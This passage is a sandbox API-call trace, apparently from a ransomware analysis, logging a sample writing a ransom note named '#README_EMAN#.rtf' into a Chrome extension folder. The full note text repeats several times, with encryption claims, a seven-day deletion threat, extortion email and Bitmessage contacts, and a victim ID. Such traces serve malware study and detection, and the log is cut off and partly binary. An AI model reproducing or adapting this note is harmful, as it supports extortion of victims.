t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.585] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.586] CloseHandle (hObject=0x2f0) returned 1 [0286.586] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0286.586] GetLastError () returned 0x2 [0286.586] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.587] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.587] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.587] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 